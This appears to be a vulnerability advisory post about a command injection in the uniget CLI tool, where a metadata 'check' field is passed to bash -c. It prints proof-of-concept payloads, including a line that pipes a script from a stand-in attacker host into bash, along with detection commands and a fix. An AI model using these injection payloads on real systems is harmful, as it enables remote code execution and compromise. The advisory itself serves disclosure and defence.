uniget, Command Injection, CVE-Not-Applicable (Medium)

Listen to this Post

How the mentioned CVE works:

The vulnerability stems from unsafe execution of the `check` field in uniget metadata. The `RunVersionCheck()` function in `tool.go:250` uses exec.Command("/bin/bash", "-c", tool.Check+" | tr -d '\n'"). The `tool.Check` string is populated directly from untrusted JSON metadata via `json.Unmarshal()` into a `Tool` struct. No validation or sanitization is applied before passing the string to a shell. Because `/bin/bash -c` interprets metacharacters like ;, &&, |, $(), and backticks, an attacker can inject arbitrary commands. When a user runs describe, install, update, or `inspect` on a malicious tool entry, the injected command executes. The metadata cache file (~/.local/var/cache/uniget/metadata.json) is under attacker control if they can write to that path or trick the user into adding a malicious repository. The PoC creates a metadata entry with "check": "echo '1.0.0'; id > /tmp/rce-proof.txt". Running `uniget describe evil-tool` triggers the injection, writing `id` output to /tmp/rce-proof.txt. This confirms arbitrary command execution with the user’s privileges. The vulnerability requires no special permissions beyond writing to the metadata cache or importing a malicious tool definition. It affects all uniget operations that invoke version checking. The root cause is using a shell to evaluate a dynamically loaded string instead of calling a fixed binary directly.

dailycve form:

Platform: uniget command-line tool
Version: All vulnerable versions
Vulnerability: Command injection via
Severity: Medium (arbitrary code)
date: 2025-05-07

Prediction: Patch within 2 weeks

What Undercode Say:

Analytics

Count vulnerable function calls
grep -rn "exec.Command.bash -c" tool.go | wc -l
Simulate unsafe pattern
echo '{"check":"id; touch /tmp/poc"}' | jq -r '.check' | xargs -I {} bash -c "{}"
Monitor process tree for injected commands
strace -f -e execve uniget describe evil-tool 2>&1 | grep -E "execve.bash"
Extract all check fields from metadata
jq '.tools[].check' ~/.local/var/cache/uniget/metadata.json

Exploit:

Create malicious JSON in metadata cache with shell metacharacters in “check” field. Example: "check": "echo vulnerable; curl http://attacker.com/backdoor.sh | bash". Trigger via uniget describe <toolname>. The injected command runs with user privileges.

Protection from this CVE:

Replace `exec.Command(“/bin/bash”, “-c”, tool.Check+” | tr -d ‘\n'”)` with direct binary execution, e.g., exec.Command(tool.Binary, "--version"). If dynamic checks required, validate against an allowlist of safe commands (e.g., only version --output). Avoid shell invocation entirely; use `exec.Command` with separated arguments. Update uniget to latest patched version as soon as available. Do not load metadata from untrusted sources.

Impact:

Arbitrary command execution leading to data exfiltration, malware installation, file tampering, persistence, and compromise of CI/CD pipelines using uniget automation. Any user processing attacker-controlled metadata is at risk.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top